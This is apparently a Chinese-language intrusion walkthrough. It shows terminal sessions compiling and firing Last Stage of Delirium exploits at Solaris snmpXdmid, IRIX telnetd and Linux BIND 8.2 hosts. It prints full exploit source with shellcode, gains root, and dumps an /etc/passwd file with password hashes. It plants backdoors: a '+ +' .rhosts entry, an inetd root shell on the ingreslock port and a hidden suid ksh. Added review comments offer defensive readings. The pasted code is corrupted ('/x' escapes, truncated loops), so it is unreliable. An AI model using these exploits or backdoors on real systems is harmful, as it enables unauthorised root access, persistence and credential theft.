# gcc -o snmp snmp.c
snmp.c: In function `main':
snmp.c:135: warning: assignment makes pointer from integer without a cast
snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type
Undefined first referenced
symbol in file
xdr_void /var/tmp/cca3rEDd.o
clnttcp_create /var/tmp/cca3rEDd.o
gethostbyname /var/tmp/cca3rEDd.o
xdr_bool /var/tmp/cca3rEDd.o
xdr_u_long /var/tmp/cca3rEDd.o
authsys_create /var/tmp/cca3rEDd.o
inet_addr /var/tmp/cca3rEDd.o
clnt_pcreateerror /var/tmp/cca3rEDd.o
xdr_array /var/tmp/cca3rEDd.o
getsockname /var/tmp/cca3rEDd.o
xdr_char /var/tmp/cca3rEDd.o
xdr_pointer /var/tmp/cca3rEDd.o
ld: fatal: Symbol referencing errors. No output written to snmp (***编译失败***)
collect2: ld returned 1 exit status
# gcc -o snmp snmp.c -lnsl
snmp.c: In function `main':
snmp.c:135: warning: assignment makes pointer from integer without a cast
snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type
Undefined first referenced
symbol in file
getsockname /var/tmp/ccBaS71K.o
ld: fatal: Symbol referencing errors. No output written to snmp
collect2: ld returned 1 exit status
# gcc -o snmp snmp.c -lnsl -lsocket (***要利用nsl和socket的库进行编译***)
snmp.c: In function `main':
snmp.c:135: warning: assignment makes pointer from integer without a cast
snmp.c:172: warning: passing arg 4 of pointer to function from incompatible pointer type
# ./snmp
copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
usage: ./snmp address [-p port] -v 7|8
#./snmp 192.168.0.4 –v 8 (***192.168.0.4 是台sunos 5.8 sparc的机器***)
copyright LAST STAGE OF DELIRIUM mar 2001 poland //lsd-pl.net/
snmpXdmid for solaris 2.7 2.8 sparc
adr=0x000c8f68 timeout=30 port=928 connected!
sent!
SunOS business 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250
id
uid=0(root) gid=0(root)
echo “+ +” >/.rhosts
echo 'ingreslock stream tcp nowait root /bin/ksh ksh -i' > /tmp/.x
/usr/sbin/inetd -s /tmp/.x
rm -f /tmp/.x
telnet localhost 1524
Trying 127.0.0.1...
Connected to localhost. Escape character is '^]'.
# id
ksh: id^M: not found
# id;
uid=0(root) gid=0(root)
ksh: ^M: not found
# exit;
Connection closed by foreign host.
Exit (***随便装个后门走人***)
#
-------------------------------------------------test--------------------------------------------------------------
SunOS 5.6 5.7 5.8的机器都有了,找找其他系统吧。
什么系统最破呢?
Win2000?
呵呵,我说的是UNIX系列。
告诉大家,IRIX最破~
HOHO~
记得昨天就扫到一台IRIX的破机器呢,我们接着来干掉它~
-------------------------------------------------test--------------------------------------------------------------
# telnet 192.168.0.10
Trying 192.168.0.10...
Connected to 192.168.0.10.
Escape character is '^]'.
IRIX (O2)
login: test
Password:
UX:login: ERROR: Login incorrect
login:^]
telnet> quit
Connection closed.
#cat > telnetd.c (***源程序在http://lsd-pl.net/files/get?IRIX/irx_telnetd ***)
#include
#include
#include
#include
#include
#include
#include
#include
/*
 * Data tables for the IRIX telnetd listing pasted above (`cat > telnetd.c`).
 * NOTE(review): throughout this page every backslash escape is rendered as a
 * forward slash (`/x04` instead of `\x04`), so as pasted these literals hold
 * ASCII text rather than the bytes the author's per-line comments describe;
 * the compiler errors shown further down the page are the consequence.
 */
/* Machine-code bytes (the comments are the author's own disassembly, using
   MIPS-style mnemonics) followed by the string "/bin/sh".  prepare_env()
   copies this array byte by byte into env_value.  A byte string of this
   shape ending in "/bin/sh" is a usable content signature for detection. */
char shellcode[]=
"/x04/x10/xff/xff" /* bltzal $zero, */
"/x24/x02/x03/xf3" /* li $v0,1011 */
"/x23/xff/x02/x14" /* addi $ra,$ra,532 */
"/x23/xe4/xfe/x08" /* addi $a0,$ra,-504 */
"/x23/xe5/xfe/x10" /* addi $a1,$ra,-496 */
"/xaf/xe4/xfe/x10" /* sw $a0,-496($ra) */
"/xaf/xe0/xfe/x14" /* sw $zero,-492($ra) */
"/xa3/xe0/xfe/x0f" /* sb $zero,-497($ra) */
"/x03/xff/xff/xcc" /* syscall */
"/bin/sh"
;
/* One human-readable description per table row; main() prints tab1[i].vers
   for the row that produced a response. */
typedef struct{char *vers;}tabent1_t;
/* Per-row numeric parameters consumed by prepare_env(): flg selects one of
   its two output layouts, len is subtracted in its address arithmetic, and
   got/g_ofs and subbuffer/s_ofs are combined into the two values it emits. */
typedef struct{int flg,len;int got,g_ofs,subbuffer,s_ofs;}tabent2_t;
/* Rows marked "no patches" are the unpatched libc/telnetd combinations; the
   numbers listed are presumably vendor patch ids whose presence changes the
   row — confirm against the vendor's advisory.
   NOTE(review): the 7th entry below was fused with the 8th during the paste
   (the compiler output later on the page reports "parse error before `IRIX'"),
   so this copy has 12 rows while tab2 has 13 and main() indexes up to 12. */
tabent1_t tab1[]={
{ "IRIX 6.2 libc.so.1: no patches telnetd: no patches " },
{ "IRIX 6.2 libc.so.1: 1918|2086 telnetd: no patches " },
{ "IRIX 6.2 libc.so.1: 3490|3723|3771 telnetd: no patches " },
{ "IRIX 6.2 libc.so.1: no patches telnetd: 1485|2070|3117|3414 " },
{ "IRIX 6.2 libc.so.1: 1918|2086 telnetd: 1485|2070|3117|3414 " },
{ "IRIX 6.2 libc.so.1: 3490|3723|3771 telnetd: 1485|2070|3117|3414 " },
{ "IRIX 6.3 libc.so.1: no patches telnetd: { "IRIX 6.3 libc.so.1: 2087 telnetd: no patches " },
{ "IRIX 6.3 libc.so.1: 3535|3737|3770 telnetd: no patches " },
{ "IRIX 6.4 libc.so.1: no patches telnetd: no patches " },
{ "IRIX 6.4 libc.so.1: 3491|3769|3738 telnetd: no patches " },
{ "IRIX 6.5-6.5.8m 6.5-6.5.7f telnetd: no patches " },
{ "IRIX 6.5.8f telnetd: no patches " }
};
/* Columns: flg, len, got, g_ofs, subbuffer, s_ofs (see tabent2_t).  Rows
   0-5 are used for -v 62, 6-8 for 63, 9-10 for 64 and 11-12 for 65. */
tabent2_t tab2[]={
{ 0, 0x56, 0x0fb44390, 115, 0x7fc4d1e0, 0x14 },
{ 0, 0x56, 0x0fb483b0, 117, 0x7fc4d1e0, 0x14 },
{ 0, 0x56, 0x0fb50490, 122, 0x7fc4d1e0, 0x14 },
{ 0, 0x56, 0x0fb44390, 115, 0x7fc4d220, 0x14 },
{ 0, 0x56, 0x0fb483b0, 117, 0x7fc4d220, 0x14 },
{ 0, 0x56, 0x0fb50490, 122, 0x7fc4d220, 0x14 },
{ 0, 0x56, 0x0fb4fce0, 104, 0x7fc4d230, 0x14 },
{ 0, 0x56, 0x0fb4f690, 104, 0x7fc4d230, 0x14 },
{ 0, 0x56, 0x0fb52900, 104, 0x7fc4d230, 0x14 },
{ 1, 0x5e, 0x0fb576d8, 88, 0x7fc4cf70, 0x1c },
{ 1, 0x5e, 0x0fb4d6dc, 102, 0x7fc4cf70, 0x1c },
{ 1, 0x5e, 0x7fc496e8, 77, 0x7fc4cf98, 0x1c },
{ 1, 0x5e, 0x7fc496e0, 77, 0x7fc4cf98, 0x1c }
};
/* Shared output buffer filled by prepare_env(), which writes through a raw
   pointer and sprintf() without checking against this size. */
char env_value[1024];
/*
 * Build the environment-variable value sent to the target for table row
 * `vers` and return its length in bytes.  Layout, as written below: a few
 * spaces, the 4 big-endian bytes of pch, (more spaces in layout 1,) the 4
 * big-endian bytes of pch+2, three spaces, the shellcode bytes, and finally
 * a printf-style format string made of `%<width>c` and positional `%<k>$hn`
 * conversions.
 *
 * What this tells a defender: a value carrying `$hn`/`%n` conversions only
 * matters to a server that hands it to a printf-family function as the
 * *format* argument.  Strings received from the network (here: telnet
 * environment values) must be passed as data, e.g. printf("%s", v); a
 * telnetd negotiation log or a NIDS rule can alert on `%` … `$hn` inside
 * option payloads.
 *
 * NOTE(review): this copy is corrupted by the paste — the line beginning
 * `b=env_` lost its tail, both inner `for` headers are truncated, and `\x`
 * escapes appear as `/x` — so the function does not compile as shown.
 */
int prepare_env(int vers){
int i,adr,pch,adrh,adrl;
char *b;
/* Two values derived from the per-version table.  adr is then split into a
   high and a low 16-bit part with the row's len subtracted from each; these
   become the decimal widths of the `%05dc` conversions emitted at the end. */
pch=tab2[vers].got+(tab2[vers].g_ofs*4);
adr=tab2[vers].subbuffer+tab2[vers].s_ofs;
adrh=(adr>>16)-tab2[vers].len;
adrl=0x10000-(adrh&0xffff)+(adr&0xffff)-tab2[vers].len;
/* `b` walks env_value; nothing below checks against sizeof env_value.
   (This line is truncated in the paste.) */
b=env_ if(!tab2[vers].flg){
/* Layout 0: 1 space, pch big-endian, pch+2 big-endian, 3 spaces. */
for(i=0;i<1;i++) *b++=' ';
for(i=0;i<4;i++) *b++=(char)((pch>>((3-i%4)*8))&0xff);
/* `+` binds tighter than `>>`, so these are the bytes of (pch+2). */
for(i=0;i<4;i++) *b++=(char)((pch+2>>((3-i%4)*8))&0xff);
for(i=0;i<3;i++) *b++=' ';
/* Copy the shellcode, emitting any 0x02 or 0xff byte twice: 0xff is the
   telnet IAC byte, which must be doubled inside telnet data; 0x02 is
   presumably the ESC value of the telnet environment option — confirm.
   (Loop header truncated in the paste.) */
for(i=0;i
*b++=shellcode[i];
if((*(b-1)==(char)0x02)||(*(b-1)==(char)0xff)) *b++=shellcode[i];
}
/* Format string with positional `%22$hn` / `%23$hn` conversions; the
   `%05dc` widths are adrh and adrl.  Layout 1 uses positions 11/12. */
sprintf(b,"%%%05dc%%22$hn%%%05dc%%23$hn",adrh,adrl);
}else{
/* Layout 1: 5 spaces, pch big-endian, 4 spaces, pch+2 big-endian, 3 spaces. */
for(i=0;i<5;i++) *b++=' ';
for(i=0;i<4;i++) *b++=(char)((pch>>((3-i%4)*8))&0xff);
for(i=0;i<4;i++) *b++=' ';
for(i=0;i<4;i++) *b++=(char)((pch+2>>((3-i%4)*8))&0xff);
for(i=0;i<3;i++) *b++=' ';
/* Same shellcode copy with 0x02/0xff doubling (header truncated in paste). */
for(i=0;i
*b++=shellcode[i];
if((*(b-1)==(char)0x02)||(*(b-1)==(char)0xff)) *b++=shellcode[i];
}
sprintf(b,"%%%05dc%%11$hn%%%05dc%%12$hn",adrh,adrl);
}
/* Advance past the sprintf() text so the return value is the total length. */
b+=strlen(b);
return(b-env_value);
}
/*
 * Entry point of the telnetd listing.  argv[1] is the target host; `-v
 * 62|63|64|65` selects which rows of tab1/tab2 to try (default 65).  For
 * each row it opens a TCP connection to port 23, sends two telnet
 * subnegotiation blocks (the pasted bytes /xff/xfa/x24 … /xff/xf0 look like
 * IAC SB <option 36, the original telnet ENVIRON option> … IAC SE — confirm)
 * whose payload is the env_value built by prepare_env(), then writes a
 * "uname -a" command and treats any reply as success, after which it relays
 * stdin/stdout to the socket until one side closes.
 *
 * Defender's reading: the transcript below this listing shows uid=0 on an
 * unpatched IRIX host, i.e. telnetd was running as root.  The payload shape
 * (an environment value containing positional `%…$hn`) indicates the server
 * used a client-supplied string as a printf format — confirm against the
 * vendor advisory.  Observable signals: option-36 subnegotiations carrying
 * non-printable bytes plus `%…$hn`, followed on the same connection by a
 * shell command.  The "no patches" rows of tab1 name the affected
 * configurations; the vendor patches listed there, or replacing telnet with
 * ssh, close this.
 *
 * Style notes: no return type (pre-C99 implicit int); socket()/write()/read()
 * results are largely unchecked.
 */
main(int argc,char **argv){
char buffer[8192];
int i,c,sck,il,ih,cnt,vers=65;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net//n");
printf("telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all/n/n");
if(argc<2){
printf("usage: %s address [-v 62|63|64|65]/n",argv[0]);
exit(-1);
}
/* getopt runs over argv[1..] so that argv[1] can be the address.  The option
   string also declares s, c: and p:, but only -v is acted on. */
while((c=getopt(argc-1,&argv[1],"sc:p:v:"))!=-1){
switch(c){
case 'v': vers=atoi(optarg);
}
}
/* Map the version to an inclusive index range into tab1/tab2. */
switch(vers){
case 62: il=0;ih=5; break;
case 63: il=6;ih=8; break;
case 64: il=9;ih=10; break;
case 65: il=11;ih=12; break;
default: exit(-1);
}
for(i=il;i<=ih;i++){
printf(".");fflush(stdout);   /* one dot per row attempted */
sck=socket(AF_INET,SOCK_STREAM,0);   /* result not checked */
adr.sin_family=AF_INET;
adr.sin_port=htons(23);
/* Accept either a dotted quad or a host name. */
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
cnt=prepare_env(i);   /* fills env_value for this row; cnt is its length */
/* First block: fixed 10-byte header, env_value, then the 2-byte trailer
   appended by the sprintf format — hence the length 10+cnt+2. */
memcpy(buffer,"/xff/xfa/x24/x00/x01/x58/x58/x58/x58/x00",10);
sprintf(&buffer[10],"%s/xff/xf0",env_value);
write(sck,buffer,10+cnt+2);
sleep(1);
/* Second block: same shape, different 10-byte header.  Only the first 10
   bytes of this literal are copied; its `%s/xff/xf0` tail is dead text. */
memcpy(buffer,"/xff/xfa/x24/x00/x01/x5f/x52/x4c/x44/x00%s/xff/xf0",10);
sprintf(&buffer[10],"%s/xff/xf0",env_value);
write(sck,buffer,10+cnt+2);
/* A reply shorter than 2 bytes or not starting with 0xff is taken as a sign
   that a TCP wrapper sits in front of telnetd. */
if(((cnt=read(sck,buffer,sizeof(buffer)))<2)||(buffer[0]!=(char)0xff)){
printf("warning: telnetd seems to be used with tcp wrapper/n");
}
/* Probe command: any data coming back means this row worked — print its
   description, keep the connection open, and leave the loop. */
write(sck,"/bin/uname -a/n",14);
if((cnt=read(sck,buffer,sizeof(buffer)))>0){
printf("/n%s/n/n",tab1[i].vers);
write(1,buffer,cnt);
break;
}
close(sck);
}
if(i>ih) {printf("/nerror: not vulnerable/n");exit(-1);}   /* every row failed */
/* Interactive relay: stdin -> socket and socket -> stdout via select().  A
   read returning <1 ends the session unless errno says "try again". */
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
^D
# gcc -o telnetd telnetd.c
telnetd.c:33: parse error before `IRIX'
telnetd.c:37: malformed floating constant
telnetd.c:37: nondigits in number and not hexadecimal
telnetd.c:37: malformed floating constant
telnetd.c:38: malformed floating constant
telnetd.c:77: nondigits in number and not hexadecimal
… (***因为粘贴文本出错,一大堆出错信息***)
# vi telnetd.c (***只好用vi来编辑程序***)
"telnetd.c" [New file]
#include
#include
#include
…
(***重新粘贴一遍***)
…
"telnetd.c" [New file] 188 lines, 6738 characters
# gcc -o telnetd telnetd.c
Undefined first referenced
symbol in file
socket /var/tmp/ccuoeAph.o
gethostbyname /var/tmp/ccuoeAph.o
inet_addr /var/tmp/ccuoeAph.o
connect /var/tmp/ccuoeAph.o
ld: fatal: Symbol referencing errors. No output written to telnetd
collect2: ld returned 1 exit status
# gcc -o telnetd telnetd.c -lsocket -lnsl
# ./telnetd
copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/
telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all
usage: ./telnetd address [-v 62|63|64|65]
# ./telnetd 192.168.0.10 -v 65
copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/
telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all
.
IRIX 6.5-6.5.8m 6.5-6.5.7f telnetd: no patches
IRIX O2 6.5 05190004 IP32 (***溢出成功啦***)
id
uid=0(root) gid=0(sys)
cat /etc/passwd
root:mmanI4kyarAEA:0:0:Super-User:/:/usr/bin/tcsh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
cmwlogin:*:0:994:CMW Login UserID:/usr/CMW:/sbin/csh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
daemon:*:1:1:daemons:/:/dev/null
bin:*:2:2:System Tools Owner:/bin:/dev/null
uucp:*:3:5:UUCP Owner:/usr/lib/uucp:/bin/csh
sys:*:4:0:System Activity Owner:/var/adm:/bin/sh
adm:*:5:3:Accounting Files Owner:/var/adm:/bin/sh
lp::9:9:Print Spooler Owner:/var/spool/lp:/bin/sh ***不少人进来过呢
nuucp::10:10:Remote UUCP User:/var/spool/uucppublic:/usr/lib/uucp/uucico *
auditor:*:11:0:Audit Activity Owner:/auditor:/bin/sh
dbadmin:*:12:0:Security Database Owner:/dbadmin:/bin/sh
sgiweb:*:13:60001:SGI Web Applications:/var/www/htdocs:/bin/csh
rfindd:*:66:1:Rfind Daemon and Fsdump:/var/rfindd:/bin/sh
EZsetup::992:998:System Setup:/var/sysadmdesktop/EZsetup:/bin/csh *
demos::993:997:Demonstration User:/usr/demos:/bin/csh *
OutOfBox::995:997:Out of Box Experience:/usr/people/OutOfBox:/bin/csh *
guest::998:998:Guest Account:/usr/people/guest:/bin/csh *
4Dgifts:*:999:998:4Dgifts Account:/usr/people/4Dgifts:/bin/csh
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:60001:60001:original nobody uid:/dev/null:/dev/null
informix:*:49999:777:Informix SA 3.0:/usr/sgi/informix:/bin/csh
posuser:gyo7hUq9BFNYE:55555:20:::
antoni:zUzbvPoZ6HC4g:23117:20:antoniWang:/usr/people/antoni:/bin/csh
#mkdir /usr/lib/... (***有这么多用户可以登陆,我们做个suid root shell就可以啦。***)
cp /bin/ksh /usr/lib/.../.x
chmod +s /usr/lib/.../.x
exit
#
-------------------------------------------------test--------------------------------------------------------------
在SunOS 5.7平台下攻击IRIX 6.5 系统成功完成。:)
我们来找几台Linux 玩玩。找Redhat吧,漏洞多一些,比如rpc.statd wuftp bind lpd等。:P
我们同样以这个SunOS 5.7做为我们攻击Linux的平台。Lsd写的exploit通用性真不错。
这次我们用bind远程溢出来攻击redhat 6.2
不过因为前段时间的worm,bind的成功率已经很小啦。
大家可以试试其它的远程溢出~~
-------------------------------------------------test--------------------------------------------------------------
#cat > bind.c (***源程序在http://lsd-pl.net/files/get?LINUX/linx86_bind ***)
#include
#include
#include
#include
#include
#include
#include
/*
 * Data for the BIND listing pasted above (`cat > bind.c`).  NOTE(review): as
 * on the rest of this page, `\x` escapes appear as `/x`, so the string
 * literal below is ASCII text rather than the bytes the author's comments
 * describe.
 */
/* 23-byte hand-built DNS message that main() sends first over UDP/53 and
   whose reply it hex-dumps.  The first 12 bytes have the shape of a DNS
   header (id 0xabcd, flags 0x0980, section counts 0,1,0,0). */
char msg[]={
0xab,0xcd,0x09,0x80,0x00,0x00,0x00,0x01,
0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x01,0x20,0x20,0x20,0x20,0x02,0x61
};
/* x86 machine code (author's disassembly in the comments) laid out behind
   DNS label-length bytes of 63 ("/x3f") and ending in "/bin/sh".  The two
   bytes of the `movw $0x1234,%bx` immediate are overwritten at run time by
   main() with this client's own TCP source port, which suggests the code
   searches socket descriptors for the connection back to this program —
   confirm against the listing.
   NOTE(review): the line `"/x41" /* incl %ecx …` lost a comment terminator
   in the paste, so the "/xe2/xf6" bytes that follow it are inside the
   comment and missing from the array. */
char asmcode[]=
"/x3f" /* label len 63 */
"/x90/x90/x90" /* padding */
"/xeb/x3b" /* jmp */
"/x31/xdb" /* xorl %ebx,%ebx */
"/x5f" /* popl %edi */
"/x83/xef/x7c" /* sub $0x7c,%edi */
"/x8d/x77/x10" /* leal 0x10(%edi),%esi */
"/x89/x77/x04" /* movl %esi,0x4(%edi) */
"/x8d/x4f/x20" /* leal 0x20(%edi),%ecx */
"/x89/x4f/x08" /* movl %ecx,0x8(%edi) */
"/xb3/x10" /* movb $0x10,%bl */
"/x89/x19" /* movl %ebx,(%ecx) */
"/x31/xc9" /* xorl %ecx,%ecx */
"/xb1/xff" /* movb $0xff,%cl */
"/x89/x0f" /* movl %ecx,(%edi) */
"/x51" /* pushl %ecx */
"/x31/xc0" /* xorl %eax,%eax */
"/xb0/x66" /* movb $0x66,%al */
"/xb3/x07" /* movb $0x7,%bl */
"/x89/xf9" /* movl %edi,%ecx */
"/xcd/x80" /* int $0x80 */
"/x59" /* popl %ecx */
"/x31/xdb" /* xorl %ebx,%ebx */
"/x39/xd8" /* cmpl %ebx,%eax */
"/x75/x0a" /* jne */
"/x66/xbb/x12/x34" /* movw $0x1234,%bx */
"/x66/x39/x5e/x02" /* cmpw %bx,0x2(%esi) */
"/x74/x08" /* je */
"/xe2/xe0" /* loop */
"/x3f" /* label len 63 */
"/xe8/xc0/xff/xff/xff" /* call */
"/x89/xcb" /* movl %ecx,%ebx */
"/x31/xc9" /* xorl %ecx,%ecx */
"/xb1/x03" /* movb $0x03,%cl */
"/x31/xc0" /* xorl %eax,%eax */
"/xb0/x3f" /* movb $0x3f,%al */
"/x49" /* decl %ecx */
"/xcd/x80" /* int $0x80 */
"/x41" /* incl %ecx "/xe2/xf6" /* loop */
"/xeb/x14" /* jmp */
"/x31/xc0" /* xorl %eax,%eax */
"/x5b" /* popl %ebx */
"/x8d/x4b/x14" /* leal 0x14(%ebx),%ecx */
"/x89/x19" /* movl %ebx,(%ecx) */
"/x89/x43/x18" /* movl %eax,0x18(%ebx) */
"/x88/x43/x07" /* movb %al,0x7(%ebx) */
"/x31/xd2" /* xorl %edx,%edx */
"/xb0/x0b" /* movb $0xb,%al */
"/xcd/x80" /* int $0x80 */
"/xe8/xe7/xff/xff/xff" /* call */
"/bin/sh"
"/x90/x90/x90/x90" /* padding */
"/x90/x90/x90/x90"
;
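/*
 * Convert the 32-bit value `a` between host byte order and the byte order
 * used by the words this listing reads out of its reply buffer.  On a
 * little-endian host (detected by looking at the first byte of an int that
 * holds 1) the value is returned unchanged; on a big-endian host its four
 * bytes are reversed.
 *
 * Fix vs. the original: the swap is done in unsigned arithmetic.  The
 * original shifted the signed int directly, which is implementation-defined
 * for `a>>24` on negative values and undefined for `(a&0xff)<<24` whenever
 * that byte is 0x80 or more.  Results are identical on every platform where
 * the original happened to work.  Assumes a 32-bit int, as the original did.
 *
 * @param a  32-bit value read from a byte buffer and stored as int.
 * @return   `a` itself on little-endian hosts, otherwise `a` byte-swapped.
 */
int rev(int a){
    int probe = 1;
    if (*(char *)&probe) {
        return a;                       /* little-endian host: no swap needed */
    }
    unsigned int u = (unsigned int)a;   /* unsigned so no shift is UB */
    u = (u >> 24)
      | ((u >> 8) & 0x0000ff00u)
      | ((u << 8) & 0x00ff0000u)
      | (u << 24);
    return (int)u;                      /* same bit pattern the original produced */
}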
/*
 * Entry point of the BIND listing.  argv[1] is the target; `-s` (flag=1)
 * stops after the probe, `-e` (flag=2) continues.  Flow: resolve the
 * address; open one UDP and one TCP socket, both connect()ed to port 53;
 * record the TCP socket's local port; send `msg` over UDP and hex-dump the
 * reply from byte 512 on ("stack dump"); derive fp/jmp/ptr6 from the word
 * at offset 532 of that reply; build a second DNS-shaped message containing
 * those words and the asmcode bytes and send it over UDP; then write
 * "uname -a" on the TCP connection and relay stdin/stdout across it.
 *
 * Defender's reading: the transcript below this listing shows uid=0
 * afterwards, i.e. named was running as root on that host.  Observable
 * signals: a short UDP query followed by a much larger one made of 0x01
 * bytes and 63-byte labels, then a TCP/53 session carrying shell I/O rather
 * than DNS.  Mitigations: a BIND release newer than the 8.2.x versions in
 * the banner, named running as an unprivileged user in a chroot, and
 * limiting which hosts can reach port 53 at all.
 *
 * Style notes: socket() results are unchecked, `cnt=163` is an unexplained
 * constant, and the `for(i=0;i` line after the header memcpy is truncated
 * by the paste, so this copy does not compile as shown.
 */
int main(int argc,char **argv){
char buffer[1024],*b;
int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net//n");
printf("bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86/n/n");
if(argc<2){
printf("usage: %s address [-s][-e]/n",argv[0]);
printf(" -s send infoleak packet/n");
printf(" -e send exploit packet/n");
exit(-1);
}
/* getopt over argv[1..] so argv[1] can be the address.  The 'e' case has no
   break, but it is also the last label, so nothing falls through. */
while((c=getopt(argc-1,&argv[1],"se"))!=-1){
switch(c){
case 's': flag=1;break;
case 'e': flag=2;
}
}
if(flag==-1) exit(-1);   /* neither -s nor -e given */
adr.sin_family=AF_INET;
adr.sin_port=htons(53);
/* Accept either a dotted quad or a host name. */
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
if((hp=gethostbyname(argv[1]))==NULL) {
errno=EADDRNOTAVAIL;goto err;
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck[0]=socket(AF_INET,SOCK_DGRAM,0);    /* UDP: carries the two DNS messages */
sck[1]=socket(AF_INET,SOCK_STREAM,0);   /* TCP: later used as the interactive channel */
if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0) goto err;
/* Learn the TCP socket's local port.  The ioctl fallback is for a host on
   which getsockname() fails for a STREAMS socket; the page says this was
   run from SunOS 5.7, and (('S'<<8)|2) / (('T'<<8)|144) look like the
   Solaris I_PUSH "sockmod" and TI_GETMYNAME requests — confirm.  `i` is
   passed as the address-length argument. */
i=sizeof(struct sockaddr_in);
if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
struct netbuf nb;
ioctl(sck[1],(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck[1],(('T'<<8)|144),&nb);
}
/* Patch the local port into the 0x1234 placeholder of asmcode. */
n=ntohs(adr.sin_port);
asmcode[4+48+2]=(unsigned char)((n>>8)&0xff);
asmcode[4+48+3]=(unsigned char)(n&0xff);
if(write(sck[0],msg,sizeof(msg))==-1) goto err;
if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err;
/* Hex-dump everything past byte 512 of the reply, 16 bytes per line.  Note
   that buffer[532..535] is read below regardless of how much arrived. */
printf("stack dump:/n");
for(i=0;i<(cnt-512);i++){
printf("%s%02x ",(i&&(!(i%16)))?"/n":"",(unsigned char)buffer[512+i]);
}
printf("/n/n");
/* Reply bytes are interpreted as target-order 32-bit words; rev() is a
   no-op on a little-endian host. */
fp=rev(*(unsigned int*)&buffer[532]);
ofs=(0xfe)-((fp-(fp&0xffffff00))&0xff);
cnt=163;   /* byte budget shared between the ofs-sized filler and the trailing filler */
/* Plausibility check on two bytes of the dumped region. */
if((buffer[512+20+2]!=(char)0xff)&&(buffer[512+20+3]!=(char)0xbf)){
printf("system does not seem to be a vulnerable linux/n");exit(1);
}
if(flag==1){   /* -s: report the classification and stop here */
printf("system seems to be running bind 8.2.x on a linux/n");exit(-1);
}
if(cnt<(ofs+28)){
printf("frame ptr is too low to be successfully exploited/n");exit(-1);
}
/* Words to be embedded in the second message, converted with rev(). */
jmp=rev(fp-586);
ptr6=rev((fp&0xffffff00)-12);
fp=rev(fp&0xffffff00);
printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs);
printf("port=%04x connected! ",(unsigned short)n);fflush(stdout);
/* Assemble the second message in place.  Each filler loop advances `b`
   twice per iteration (once in the for-increment, once in `*b++`), so it
   covers 2*count bytes and stores 0x01 in every other one; the bytes in
   between keep whatever buffer already held. */
b=buffer;
memcpy(b,"/xab/xcd/x01/x00/x00/x02/x00/x00/x00/x00/x00/x01",12);b+=12;   /* 12-byte DNS-shaped header */
for(i=0;i   /* truncated in the paste */
for(i=0;i<(128>>1);i++,b++) *b++=0x01;
memcpy(b,"/x00/x00/x01/x00/x01",5);b+=5;
for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01;
*b++=28;   /* length byte; exactly 28 bytes follow before the next filler */
memcpy(b,"/x06/x00/x00/x00",4);b+=4;
memcpy(b,&fp,4);b+=4;
memcpy(b,"/x06/x00/x00/x00",4);b+=4;
memcpy(b,&jmp,4);b+=4;
memcpy(b,&jmp,4);b+=4;
memcpy(b,&fp,4);b+=4;
memcpy(b,&ptr6,4);b+=4;
cnt-=ofs+28;   /* what is left of the 163-byte budget */
for(i=0;i<(cnt>>1);i++,b++) *b++=0x01;
memcpy(b,"/x00/x00/x01/x00/x01/x00/x00/xfa/xff",9);b+=9;
if(write(sck[0],buffer,b-buffer)==-1) goto err;
sleep(1);printf("sent!/n");
/* From here on the TCP connection is treated as a shell session. */
write(sck[1],"/bin/uname -a/n",14);
/* Interactive relay: stdin -> socket and socket -> stdout via select().  A
   read returning <1 ends the session unless errno says "try again". */
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck[1],&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck[1],buf,cnt);
}
